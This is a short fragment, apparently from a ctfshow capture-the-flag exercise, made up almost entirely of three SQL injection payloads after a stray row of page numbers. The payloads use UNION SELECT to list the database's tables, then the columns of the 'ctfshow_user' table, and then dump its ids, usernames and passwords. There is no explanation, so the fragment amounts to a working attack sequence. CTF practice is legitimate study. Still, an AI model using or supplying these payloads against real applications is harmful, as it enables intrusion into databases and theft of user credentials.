1 2 3 4 5 6
| -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+
-1' union select id,username,password from ctfshow_user --+
|